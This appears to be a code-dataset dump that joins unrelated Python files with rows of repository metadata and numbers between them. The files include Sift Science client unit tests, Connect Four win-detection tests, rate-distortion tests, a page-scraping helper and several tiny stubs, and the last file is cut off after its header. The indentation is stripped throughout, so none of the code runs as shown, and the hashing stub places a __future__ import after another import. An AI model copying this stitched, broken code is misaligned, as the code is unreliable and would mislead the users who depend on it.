mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
user_id = u'23056'
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
assert(self.sift_client.track(
u'$transaction',
valid_transaction_properties()))
assert(self.sift_client.label(
user_id,
valid_label_properties()))
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
assert(self.sift_client.score(
user_id, abuse_types=[u'payment_abuse', 'content_abuse']))
def test_unlabel_user_with_special_chars_ok(self):
user_id = "54321=.-_+@:&^%!$"
mock_response = mock.Mock()
mock_response.status_code = 204
with mock.patch.object(self.sift_client.session, 'delete') as mock_delete:
mock_delete.return_value = mock_response
response = self.sift_client.unlabel(user_id)
mock_delete.assert_called_with(
'https://api.siftscience.com/v205/users/%s/labels' % urllib.quote(user_id),
headers=mock.ANY,
timeout=mock.ANY,
params={'api_key': self.test_key})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
def test_label_user__with_special_chars_ok(self):
user_id = '54321=.-_+@:&^%!$'
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.label(
user_id, valid_label_properties())
properties = {
'$abuse_type': 'content_abuse',
'$is_bad': True,
'$description': 'Listed a fake item',
'$source': 'Internal Review Queue',
'$analyst': 'super.sleuth@example.com'
}
properties.update({'$api_key': self.test_key, '$type': '$label'})
data = json.dumps(properties)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/users/%s/labels' % urllib.quote(user_id),
data=data,
headers=mock.ANY,
timeout=mock.ANY,
params={})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
def test_score__with_special_user_id_chars_ok(self):
user_id = '54321=.-_+@:&^%!$'
mock_response = mock.Mock()
mock_response.content = score_response_json()
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.score(user_id, abuse_types=['legacy'])
mock_get.assert_called_with(
'https://api.siftscience.com/v205/score/%s' % urllib.quote(user_id),
params={'api_key': self.test_key, 'abuse_types': 'legacy'},
headers=mock.ANY,
timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_error_message == "OK")
assert(response.body['score'] == 0.85)
assert(response.body['scores']['content_abuse']['score'] == 0.14)
assert(response.body['scores']['payment_abuse']['score'] == 0.97)
def test_exception_during_track_call(self):
warnings.simplefilter("always")
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.side_effect = mock.Mock(
side_effect=requests.exceptions.RequestException("Failed"))
with self.assertRaises(sift.client.ApiException):
self.sift_client.track('$transaction', valid_transaction_properties())
def test_exception_during_score_call(self):
warnings.simplefilter("always")
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.side_effect = mock.Mock(
side_effect=requests.exceptions.RequestException("Failed"))
with self.assertRaises(sift.client.ApiException):
self.sift_client.score('Fred')
def test_exception_during_unlabel_call(self):
warnings.simplefilter("always")
with mock.patch.object(self.sift_client.session, 'delete') as mock_delete:
mock_delete.side_effect = mock.Mock(
side_effect=requests.exceptions.RequestException("Failed"))
with self.assertRaises(sift.client.ApiException):
self.sift_client.unlabel('Fred')
def test_return_actions_on_track(self):
event = '$transaction'
mock_response = mock.Mock()
mock_response.content = ('{"status": 0, "error_message": "OK", "score_response": %s}'
% action_response_json())
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'post') as mock_post:
mock_post.return_value = mock_response
response = self.sift_client.track(
event, valid_transaction_properties(), return_action=True)
mock_post.assert_called_with(
'https://api.siftscience.com/v205/events',
data=mock.ANY,
headers=mock.ANY,
timeout=mock.ANY,
params={'return_action': 'true'})
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.api_status == 0)
assert(response.api_error_message == "OK")
actions = response.body["score_response"]['actions']
assert(actions)
assert(actions[0]['action'])
assert(actions[0]['action']['id'] == 'freds_action')
assert(actions[0]['triggers'])
def test_get_workflow_status(self):
mock_response = mock.Mock()
mock_response.content = """
{
"id": "4zxwibludiaaa",
"config": {
"id": "5rrbr4iaaa",
"version": "1468367620871"
},
"config_display_name": "workflow config",
"abuse_types": [
"payment_abuse"
],
"state": "running",
"entity": {
"id": "example_user",
"type": "user"
},
"history": [
{
"app": "decision",
"name": "decision",
"state": "running",
"config": {
"decision_id": "user_decision"
}
},
{
"app": "event",
"name": "Event",
"state": "finished",
"config": {}
},
{
"app": "user",
"name": "Entity",
"state": "finished",
"config": {}
}
]
}
"""
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_workflow_status('4zxwibludiaaa', timeout=3)
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/workflows/runs/4zxwibludiaaa',
headers=mock.ANY, auth=mock.ANY, timeout=3)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['state'] == 'running')
def test_get_user_decisions(self):
mock_response = mock.Mock()
mock_response.content = """
{
"decisions": {
"payment_abuse": {
"decision": {
"id": "user_decision"
},
"time": 1468707128659,
"webhook_succeeded": false
}
}
}
"""
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_user_decisions('example_user')
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/example_user/decisions',
headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['decisions']['payment_abuse']['decision']['id'] == 'user_decision')
def test_get_order_decisions(self):
mock_response = mock.Mock()
mock_response.content = """
{
"decisions": {
"payment_abuse": {
"decision": {
"id": "decision7"
},
"time": 1468599638005,
"webhook_succeeded": false
},
"promotion_abuse": {
"decision": {
"id": "good_order"
},
"time": 1468517407135,
"webhook_succeeded": true
}
}
}
"""
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_order_decisions('example_order')
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/orders/example_order/decisions',
headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['decisions']['payment_abuse']['decision']['id'] == 'decision7')
assert(response.body['decisions']['promotion_abuse']['decision']['id'] == 'good_order')
def test_get_session_decisions(self):
mock_response = mock.Mock()
mock_response.content = """
{
"decisions": {
"account_takeover": {
"decision": {
"id": "session_decision"
},
"time": 1461963839151,
"webhook_succeeded": true
}
}
}
"""
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_session_decisions('example_user', 'example_session')
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/example_user/sessions/example_session/decisions',
headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['decisions']['account_takeover']['decision']['id'] == 'session_decision')
def test_get_content_decisions(self):
mock_response = mock.Mock()
mock_response.content = """
{
"decisions": {
"content_abuse": {
"decision": {
"id": "content_looks_bad_content_abuse"
},
"time": 1468517407135,
"webhook_succeeded": true
}
}
}
"""
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
with mock.patch.object(self.sift_client.session, 'get') as mock_get:
mock_get.return_value = mock_response
response = self.sift_client.get_content_decisions('example_user', 'example_content')
mock_get.assert_called_with(
'https://api3.siftscience.com/v3/accounts/ACCT/users/example_user/content/example_content/decisions',
headers=mock.ANY, auth=mock.ANY, timeout=mock.ANY)
self.assertIsInstance(response, sift.client.Response)
assert(response.is_ok())
assert(response.body['decisions']['content_abuse']['decision']['id'] == 'content_looks_bad_content_abuse')
def test_provided_session(self):
session = mock.Mock()
client = sift.Client(api_key=self.test_key, account_id=self.account_id, session=session)
mock_response = mock.Mock()
mock_response.content = '{"status": 0, "error_message": "OK"}'
mock_response.json.return_value = json.loads(mock_response.content)
mock_response.status_code = 200
mock_response.headers = response_with_data_header()
session.post.return_value = mock_response
event = '$transaction'
client.track(event, valid_transaction_properties())
session.post.assert_called_once()
def main():
unittest.main()
if __name__ == '__main__':
main()
| 41.669983
| 119
| 0.581705
| 5,301
| 50,254
| 5.219393
| 0.057914
| 0.085008
| 0.044022
| 0.021975
| 0.864139
| 0.843068
| 0.818671
| 0.788022
| 0.768541
| 0.754446
| 0
| 0.026954
| 0.3031
| 50,254
| 1,205
| 120
| 41.704564
| 0.763063
| 0.014188
| 0
| 0.63814
| 0
| 0.004651
| 0.264572
| 0.013208
| 0
| 0
| 0
| 0
| 0.173953
| 1
| 0.053953
| false
| 0
| 0.009302
| 0.004651
| 0.068837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
acee07184eccee56bc00263e8140ad8eabcf1233
| 1,373
|
py
|
Python
|
Paris/2015/2015-05-21-Power4-Python-Randori/power4_test.py
|
murex/coding-dojo
|
7e84cc971f6716d9ff2c3cbf22c11cfe93d8d275
|
[
"MIT"
] | 10
|
2015-08-05T15:27:06.000Z
|
2018-10-10T13:57:42.000Z
|
Paris/2015/2015-05-21-Power4-Python-Randori/power4_test.py
|
murex/coding-dojo
|
7e84cc971f6716d9ff2c3cbf22c11cfe93d8d275
|
[
"MIT"
] | 6
|
2015-09-09T14:04:18.000Z
|
2016-09-01T19:46:50.000Z
|
Paris/2015/2015-05-21-Power4-Python-Randori/power4_test.py
|
murex/coding-dojo
|
7e84cc971f6716d9ff2c3cbf22c11cfe93d8d275
|
[
"MIT"
] | 10
|
2015-08-12T12:26:42.000Z
|
2016-03-09T12:44:06.000Z
|
import power4
#def test_final():
# assert power4.isOver([
# [0, 1, 2, 1, 2, 1, 1],
# [0, 2, 1, 1, 1, 2, 2],
# [0, 1, 2, 2, 2, 1, 1],
# [1, 2, 1, 1, 1, 2, 2],
# [2, 1, 1, 2, 2, 2, 1],
# [1, 2, 2, 1, 2, 1, 2],
# ]) == True
def test_p1_win_one_line():
assert power4.isOver([[0, 1, 1, 1, 1, 2, 1]]) == True
def test_p2_win_one_line():
assert power4.isOver([[0, 1, 2, 2, 2, 2, 1]]) == True
def test_draw_one_line():
assert power4.isOver([[0, 1, 2, 1, 2, 2, 1]]) == False
def test_p1_win_with_two_lines():
assert power4.isOver([
[0, 1, 2, 1, 2, 2, 1],
[0, 1, 1, 1, 1, 2, 1]
]) == True
def test_p1_wins_one_column():
assert power4.isOver([
[0],
[0],
[1],
[1],
[1],
[1]
]) == True
def test_p2_wins_one_column():
assert power4.isOver([
[0],
[0],
[2],
[2],
[2],
[2]
]) == True
def test_p2_wins_one_column():
assert power4.isOver([
[0,0],
[0,0],
[0,1],
[2,1],
[2,1],
[2,1]
]) == True
def test_diagonal():
assert power4.isOver([
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1, 2],
[0, 0, 0, 0, 1, 2, 1],
[0, 0, 0, 1, 2, 1, 2],
]) == True
| 24.087719
| 58
| 0.405681
| 229
| 1,373
| 2.30131
| 0.104803
| 0.129032
| 0.1537
| 0.166983
| 0.844402
| 0.777989
| 0.721063
| 0.673624
| 0.402277
| 0.375712
| 0
| 0.184455
| 0.372178
| 1,373
| 57
| 59
| 24.087719
| 0.426914
| 0.172615
| 0
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.166667
| true
| 0
| 0.020833
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4a0bdd636cedff721af320c0b637a31b7f175f00
| 118
|
py
|
Python
|
scripts/hashing_file.py
|
Pyt45/algorithms-dataStructure-python
|
d88a5225e49dd1cbce5363b1f88c0f207a301d5c
|
[
"MIT"
] | null | null | null |
scripts/hashing_file.py
|
Pyt45/algorithms-dataStructure-python
|
d88a5225e49dd1cbce5363b1f88c0f207a301d5c
|
[
"MIT"
] | null | null | null |
scripts/hashing_file.py
|
Pyt45/algorithms-dataStructure-python
|
d88a5225e49dd1cbce5363b1f88c0f207a301d5c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import hashlib
from __future__ import annotations
def hash_file(filepath: str) -> str:
pass
| 19.666667
| 36
| 0.754237
| 17
| 118
| 4.941176
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 118
| 6
| 37
| 19.666667
| 0.84
| 0.169492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
4a18df85db89a74d3a14478fc1fd46600e185ad1
| 75
|
py
|
Python
|
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
testprojects/src/python/interpreter_selection/resolver_blacklist_testing/import_futures.py
|
jakubbujny/pants
|
e7fe73eaa3bc196d6d976e9f362bf60b69da17b3
|
[
"Apache-2.0"
] | null | null | null |
from concurrent.futures import Future
print(Future)
print('Successful.')
| 12.5
| 37
| 0.786667
| 9
| 75
| 6.555556
| 0.777778
| 0.372881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 5
| 38
| 15
| 0.880597
| 0
| 0
| 0
| 0
| 0
| 0.146667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
c580949857f3976fb370e53d68493dbcf3c4bb72
| 26
|
py
|
Python
|
src/torchphysics/problem/domains/domain3D/__init__.py
|
uwe-iben/torchphysics
|
f0a56539cff331d49caaa90bc2fdd0d238b298f8
|
[
"Apache-2.0"
] | 203
|
2021-11-10T10:33:29.000Z
|
2022-03-26T09:05:12.000Z
|
src/torchphysics/problem/domains/domain3D/__init__.py
|
DKreuter/torchphysics
|
775d9aca71752a568f1fca972c958b99107f3b7c
|
[
"Apache-2.0"
] | 3
|
2022-01-07T19:57:00.000Z
|
2022-03-10T08:04:49.000Z
|
src/torchphysics/problem/domains/domain3D/__init__.py
|
DKreuter/torchphysics
|
775d9aca71752a568f1fca972c958b99107f3b7c
|
[
"Apache-2.0"
] | 16
|
2021-09-30T08:35:37.000Z
|
2022-03-16T13:12:22.000Z
|
from .sphere import Sphere
| 26
| 26
| 0.846154
| 4
| 26
| 5.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c5bb672121f33a73d318922d931854a9e1e22879
| 4,148
|
py
|
Python
|
dit/rate_distortion/tests/test_curves.py
|
leoalfonso/dit
|
e7d5f680b3f170091bb1e488303f4255eeb11ef4
|
[
"BSD-3-Clause"
] | 1
|
2021-03-15T08:51:42.000Z
|
2021-03-15T08:51:42.000Z
|
dit/rate_distortion/tests/test_curves.py
|
leoalfonso/dit
|
e7d5f680b3f170091bb1e488303f4255eeb11ef4
|
[
"BSD-3-Clause"
] | null | null | null |
dit/rate_distortion/tests/test_curves.py
|
leoalfonso/dit
|
e7d5f680b3f170091bb1e488303f4255eeb11ef4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Tests for dit.rate_distortion.curves
"""
from __future__ import division
import pytest
import numpy as np
from dit import Distribution
from dit.rate_distortion.curves import IBCurve, RDCurve
from dit.rate_distortion.distortions import hamming, maximum_correlation, residual_entropy
from dit.shannon import entropy
@pytest.mark.flaky(reruns=5)
def test_simple_rd_1():
"""
Test against know result, using scipy.
"""
dist = Distribution(['0', '1'], [1/2, 1/2])
rd = RDCurve(dist, beta_num=10)
for r, d in zip(rd.rates, rd.distortions):
assert r == pytest.approx(1 - entropy(d))
@pytest.mark.flaky(reruns=5)
def test_simple_rd_2():
"""
Test against know result, using scipy.
"""
dist = Distribution(['0', '1'], [1/2, 1/2])
rd = RDCurve(dist, rv=[0], beta_num=10, alpha=0.5, distortion=maximum_correlation)
assert rd.distortions[0] == pytest.approx(1.0)
@pytest.mark.flaky(reruns=5)
def test_simple_rd_3():
"""
Test against know result, using scipy.
"""
dist = Distribution(['00', '01', '10', '11'], [1/4]*4)
rd = RDCurve(dist, rv=[0], crvs=[1], beta_num=10, alpha=0.5, distortion=maximum_correlation)
assert rd.distortions[0] == pytest.approx(1.0)
@pytest.mark.flaky(reruns=5)
def test_simple_rd_4():
"""
Test against know result, using scipy.
"""
dist = Distribution(['0', '1'], [1/2, 1/2])
rd = RDCurve(dist, beta_num=10, alpha=0.0, distortion=residual_entropy)
assert rd.distortions[0] == pytest.approx(1.0)
@pytest.mark.flaky(reruns=5)
def test_simple_rd_5():
"""
Test against know result, using blahut-arimoto.
"""
dist = Distribution(['0', '1'], [1/2, 1/2])
rd = RDCurve(dist, beta_num=10, method='ba')
for r, d in zip(rd.rates, rd.distortions):
assert r == pytest.approx(1 - entropy(d))
@pytest.mark.flaky(reruns=5)
def test_simple_rd_6():
"""
Test against know result, using blahut-arimoto.
"""
dist = Distribution(['0', '1'], [1/2, 1/2])
rd = RDCurve(dist, rv=[0], beta_num=10, beta_max=None, method='ba', distortion=residual_entropy)
assert rd.distortions[0] == pytest.approx(2.0)
@pytest.mark.flaky(reruns=5)
def test_simple_ib_1():
"""
Test against known values.
"""
dist = Distribution(['00', '02', '12', '21', '22'], [1/5]*5)
ib = IBCurve(dist, rvs=[[0], [1]], beta_max=10, beta_num=21)
assert ib.complexities[2] == pytest.approx(0.0, abs=1e-4)
assert ib.complexities[5] == pytest.approx(0.8, abs=1e-4)
assert ib.complexities[20] == pytest.approx(1.5129028136502387, abs=1e-4)
assert ib.relevances[2] == pytest.approx(0.0, abs=1e-4)
assert ib.relevances[5] == pytest.approx(0.4, abs=1e-4)
assert ib.relevances[20] == pytest.approx(0.5701613885745838, abs=1e-4)
assert 3.0 in ib.find_kinks()
@pytest.mark.flaky(reruns=5)
def test_simple_ib_2():
"""
Test against known values.
"""
dist = Distribution(['00', '02', '12', '21', '22'], [1/5]*5)
ib = IBCurve(dist, beta_max=None, beta_num=21, alpha=0.0)
assert ib.complexities[2] == pytest.approx(0.0, abs=1e-4)
assert ib.complexities[12] == pytest.approx(0.97095059445466858, abs=1e-4)
assert ib.complexities[20] == pytest.approx(1.5219280948873621, abs=1e-4)
assert ib.relevances[2] == pytest.approx(0.0, abs=1e-4)
assert ib.relevances[12] == pytest.approx(0.4199730940219748, abs=1e-4)
assert ib.relevances[20] == pytest.approx(0.5709505944546684, abs=1e-4)
@pytest.mark.flaky(reruns=5)
def test_simple_ib_3():
"""
Test against known values.
"""
dist = Distribution(['00', '02', '12', '21', '22'], [1/5]*5)
ib = IBCurve(dist, beta_max=None, beta_num=21, alpha=0.5)
assert ib.complexities[2] == pytest.approx(0.0, abs=1e-4)
assert ib.complexities[5] == pytest.approx(0.8522009308325029, abs=1e-4)
assert ib.complexities[20] == pytest.approx(1.5219280948873621, abs=1e-4)
assert ib.relevances[2] == pytest.approx(0.0, abs=1e-4)
assert ib.relevances[5] == pytest.approx(0.4080081559717983, abs=1e-4)
assert ib.relevances[20] == pytest.approx(0.5709505944546684, abs=1e-4)
| 33.723577
| 100
| 0.654532
| 640
| 4,148
| 4.157813
| 0.140625
| 0.10823
| 0.040586
| 0.072153
| 0.814356
| 0.806088
| 0.806088
| 0.806088
| 0.788425
| 0.701616
| 0
| 0.115619
| 0.168033
| 4,148
| 122
| 101
| 34
| 0.655462
| 0.088959
| 0
| 0.485714
| 0
| 0
| 0.014301
| 0
| 0
| 0
| 0
| 0
| 0.357143
| 1
| 0.128571
| false
| 0
| 0.1
| 0
| 0.228571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c5d0c67ebbc995217c9f97f77ee9c1f0c4fdee29
| 97
|
py
|
Python
|
ETC/CCC/__init__.py
|
pranaysy/ETCPy
|
d08c50ae5e379ee11cc9d9eb076ae4319516314c
|
[
"Apache-2.0"
] | 10
|
2020-07-30T12:03:24.000Z
|
2022-02-14T17:45:29.000Z
|
ETC/CCC/__init__.py
|
pranaysy/ETCPy
|
d08c50ae5e379ee11cc9d9eb076ae4319516314c
|
[
"Apache-2.0"
] | null | null | null |
ETC/CCC/__init__.py
|
pranaysy/ETCPy
|
d08c50ae5e379ee11cc9d9eb076ae4319516314c
|
[
"Apache-2.0"
] | 2
|
2021-02-18T07:20:34.000Z
|
2021-03-15T04:10:33.000Z
|
#
from ETC.CCC.compute_CCC import compute, get_params
from ETC.CCC.simulate_AR import coupled_AR
| 24.25
| 51
| 0.835052
| 17
| 97
| 4.529412
| 0.588235
| 0.181818
| 0.25974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103093
| 97
| 3
| 52
| 32.333333
| 0.885057
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c5dba45eb7f0e76474acbeffd19721d126204324
| 2,070
|
py
|
Python
|
airflow_docker/dags/robots/my_robots.py
|
GeorgeManakanatas/AirflowScraping
|
07be17d5dee1135cba267a2b4ca742e21391f529
|
[
"Apache-2.0"
] | 1
|
2020-09-14T05:16:48.000Z
|
2020-09-14T05:16:48.000Z
|
airflow_docker/dags/robots/my_robots.py
|
GeorgeManakanatas/AirflowScraping
|
07be17d5dee1135cba267a2b4ca742e21391f529
|
[
"Apache-2.0"
] | null | null | null |
airflow_docker/dags/robots/my_robots.py
|
GeorgeManakanatas/AirflowScraping
|
07be17d5dee1135cba267a2b4ca742e21391f529
|
[
"Apache-2.0"
] | null | null | null |
from config import my_config
from bs4 import BeautifulSoup
import requests
import logging
# Reading config file into global variable
my_config.config_file()
# setting up scraping logger
logger = logging.getLogger('scraping')
def get_page(page_url):
'''
Checks is page returns 200 code and if so retreives content
Partameters:
page_url (str): The page url
Returns:
Str: The page contnets or null
Bool : True if code is 200, False if anythong else
'''
#
logger.info('Checking access for page : %s',page_url)
#
try:
# making request to page
request_page = requests.get(page_url)
logger.info(request_page)
# working with the reply
if request_page.status_code == 200:
logger.info('Return code 200 for : %s',page_url)
request_page = request_page.content.decode()
logger.info('Page content is:\n\n %s \n\n', str(request_page))
return request_page, True
else:
logger.warning('Retun code not 200 for : %s', page_url)
return 'null', False
except Exception as exc:
logger.error('Error accessing the page: %s', exc)
def get_page_with_soup(page_url):
'''
Checks is page returns 200 code and if so retreives content
Partameters:
page_url (str): The page url
Returns:
Str: The page contnets or null
Bool : True if code is 200, False if anythong else
'''
#
logger.info('Checking access for page : %s',page_url)
#
try:
# making request to page
request_page = requests.get(page_url)
logger.info(request_page)
# working with the reply
if request_page.status_code == 200:
logger.info('Return code 200 for : %s',page_url)
return request_page, True
else:
logger.warning('Retun code not 200 for : %s', page_url)
return 'null', False
except Exception as exc:
logger.error('Error accessing the page: %s', exc)
| 29.571429
| 74
| 0.619324
| 278
| 2,070
| 4.496403
| 0.248201
| 0.0784
| 0.0384
| 0.0352
| 0.7696
| 0.7696
| 0.7696
| 0.7696
| 0.7696
| 0.7696
| 0
| 0.021321
| 0.297585
| 2,070
| 69
| 75
| 30
| 0.838377
| 0.277295
| 0
| 0.705882
| 0
| 0
| 0.184659
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a8463fc5e1d38e1a8eb60e84c0781ed90ff42d15
| 133
|
py
|
Python
|
thenewboston_node/core/utils/dataclass.py
|
MLonTNB/thenewboston-node
|
3fbd0fc36c4f0eabaa8267f2a0be2fd717f133d1
|
[
"MIT"
] | null | null | null |
thenewboston_node/core/utils/dataclass.py
|
MLonTNB/thenewboston-node
|
3fbd0fc36c4f0eabaa8267f2a0be2fd717f133d1
|
[
"MIT"
] | null | null | null |
thenewboston_node/core/utils/dataclass.py
|
MLonTNB/thenewboston-node
|
3fbd0fc36c4f0eabaa8267f2a0be2fd717f133d1
|
[
"MIT"
] | null | null | null |
import typing
def is_optional(type_):
return typing.get_origin(type_) is typing.Union and type(None) in typing.get_args(type_)
| 22.166667
| 92
| 0.774436
| 22
| 133
| 4.409091
| 0.636364
| 0.185567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135338
| 133
| 5
| 93
| 26.6
| 0.843478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
a88db185fce449065e50d7b74d2e9e2a98e4c0b9
| 7,673
|
py
|
Python
|
experiments/UrbanSound8K/models/OneDCNN_Abdoli2019.py
|
RomeroGuDw/wavelet_networks
|
0fd6871ff9f03a3cb26f1c414728aed89a33b99c
|
[
"MIT"
] | 59
|
2020-06-12T09:16:52.000Z
|
2022-03-10T09:30:58.000Z
|
experiments/UrbanSound8K/models/OneDCNN_Abdoli2019.py
|
RomeroGuDw/wavelet_networks
|
0fd6871ff9f03a3cb26f1c414728aed89a33b99c
|
[
"MIT"
] | 1
|
2020-09-13T01:43:44.000Z
|
2022-02-16T14:33:18.000Z
|
experiments/UrbanSound8K/models/OneDCNN_Abdoli2019.py
|
RomeroGuDw/wavelet_networks
|
0fd6871ff9f03a3cb26f1c414728aed89a33b99c
|
[
"MIT"
] | 1
|
